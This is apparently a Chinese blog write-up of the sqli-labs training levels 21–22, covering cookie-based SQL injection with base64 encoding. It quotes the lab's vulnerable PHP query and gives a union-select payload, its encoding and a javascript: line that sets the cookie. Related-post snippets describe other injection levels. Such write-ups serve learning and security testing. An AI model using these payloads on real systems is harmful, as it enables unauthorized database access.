sql-lab:Less21-22(后续接着更新)

最新推荐文章于 2024-10-17 20:40:27 发布
最新推荐文章于 2024-10-17 20:40:27 发布
阅读量167 收藏
点赞数
分类专栏: 网络安全 文章标签: 安全漏洞 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/117115601
版权

文章目录

Less-21

此题为SQL注入中的一种注入方式,为cookie注入,具体详解见如下链接
链接:https://blog.csdn.net/LSYZWF/article/details/117072765

Less-22

此题原理和Less-21一致,只是在构造拼接字段有所差异

题目提示为双引号的base64编码cookie注入
可以猜测后面的字段应该是用双引号括起来的
查看源码SQL语句:

$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

注意第二行,在对cookie进行base64解码后的结果两边加上双引号

查询数据库
编码前:1" union select 1,database(),3#
base64编码后:MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==

设置cookie
可以在地址栏直接设置:
javascript:alert(document.cookie=‘uname=’+escape(‘MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==’))

重新打开网址,得到结果
在这里插入图片描述
查表和查字段也是一样,对需要拼接的语句base64编码后设置cookie即可。

DiliLearngent
关注
专栏目录
sqli labs less 21
Xiaoxiaoqiang_的博客
03-04 232
sql注入
Sqli-Lab | Less 21-23
酉酉的博客
02-08 588
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
sqli-labs————less 21
Fly_鹏程万里
05-12 1595
Less-21做一个简单测试:username:adminpassword:aaa这里的界面和上一关的内容差不多,唯一的区别就是cookie使用了base64进行了加密,这里我们贴出该关的代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtm...
sql注入】Less21-25a
lyy0xfff的博客
07-16 238
SQL注入PrefaceLess-21Less-22Less-23Less-25Less-25a Preface 由于前面20关我已经做完了,所以后面的个别关卡只提供一个思路或者如何绕过防御以及证明注入点存在即可,思路都是Less-1我们学的子查询语句 Less-21 0x00 由题目得知这是一道Cookie注入的题目,且cookie被编码成base64的编码格式。 什么是base64编码呢 Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进
生命在于折腾——SQL注入的实操(五)less21-25
易水哲的博客
08-21 438
sql-lib项目,本篇文章介绍关卡21-25。 闭合变成了双引号,其余和上一关一样。 这一关过滤了注释符号,不看php文件会感觉无从下手,查看源代码发现吧# --+注释符号给过滤掉了,这里使用’。输入http://sql/Less-23/?id=’ union select 1,13,database() ’ 输入http://sql/Less-23/?id=’ union select 1,2,group_concat(table_na
sql-lab 1~10总结(后续持续更新
m0_62879498的博客
12-11 697
sql注入的一般流程: (1~6关) 判断注入点 当 id=1 and 1=2 – q页面异常是可能存在在sql注入 若页面出现非法,使用其他注入。 判断字段数 order by (根据指定的列对结果进行排序),输出的数字超过列数,报错,因此可以借助此特性,进行列数的判断。 判断回显点 eg: union select 1,2,3 页面显示2,说明回显点在2 注意:要让id的值等于一个不存在的值,这样联合查询的返回值会让union之后的查询结果在数组的第一列。只有让id的只是一个不
Sql-lab全解_sqllab
2301_79985178的博客
06-20 603
表名:?列名:??
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1192
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
从零开始的sqli-lab(1-21
qq_51248658的博客
01-13 1114
第一页完结
Sql-lab全解_sqllab,给后辈的一点建议
m0_60721649的博客
04-08 889
引起报错的是0x7e这里也就是~符号,这里回显会执行后面的select语句同时以报错的方式回显表名:?表列:?结果:?
sqli-lab(5~6详解)
gongjingege的博客
10-17 723
** Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入) ** 知识点:1,时间延迟型手工注入;布尔型手工注入;使用concat聚合函数 2,payload原理及防御措施 3,sqlmap真香,脚本也好使 ** 0x0a 时间延迟型手工注入 ** ps: 什么是时间盲注,时间盲注就是页面不会有回显,没有回显怎么办?这时候我们可以通过sleep(),让他沉睡 为什么通过sleep() 可以判断是否存在时间盲注,因为只要
(手工)【sqli-labs21-22】cookie加密注入:payload、利用过程
07-11 534
SQL-cookie加密注入】
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 3081
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
PostgreSQL学习笔记:PostgreSQL vs MySQL
软件行业技术文化交流。
10-15 1181
综上所述,PostgreSQL 和 MySQL 各有优缺点,选择哪种数据库取决于具体的应用场景和需求。如果需要处理复杂的数据类型、强大的事务支持和高级的查询功能,PostgreSQL 可能是更好的选择。如果对写入性能和简单易用性有较高要求,MySQL 可能更适合。在实际应用中,可以根据具体情况进行评估和测试,选择最适合的数据库管理系统。两者都有商业公司提供支持服务。例如,MySQL 有 Oracle 公司的商业支持,PostgreSQL 有多家公司提供专业的支持和服务。
【力扣 | SQL题 | 每日4题】力扣1164,3293,1308,1270
2301_80912559的博客
10-17 1022
4 mid,四题都比较简单,没什么难度。
Spring MessageSource国际化原理
最新发布
xsgnzb的专栏
10-17 982
查找code的过程。遍历basenames找到对应的资源文件// 没有变量的情况if (bundle!= null) {// 有变量的情况,使用MessageFormat对变量进行替换if (bundle!= null) {= null) {获得ResourceBundle= null) {try {// ...
CTE 与存储过程:SQL 查询简化与复杂业务逻辑处理的最佳选择
nbsaas-boot基于Request-Response的企业级快速开发框架
10-17 999
CTE(Common Table Expression,公共表表达式)和存储过程是两种不同的SQL工具,分别用于解决不同的问题。它们各有优缺点,适用于不同的场景。让我们从以下几个方面来比较它们:CTE:存储过程:CTE:存储过程:CTE:存储过程:CTE:存储过程:总结:
【力扣 | SQL题 | 每日4题】力扣2308,2324,2346,2372
2301_80912559的博客
10-16 1189
4 mid,还是比较常规的。
ORACLE报错ORA-01804:PL/SQL登录问题解决教程
当在Windows Server 2008 R2 64位系统上,利用Oracle 12c版本的PL/SQL Developer 12 64位客户端尝试连接并执行PL/SQL代码时,遇到"error while trying to retrieve text for error ORA-01804"错误。这个错误通常表示...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值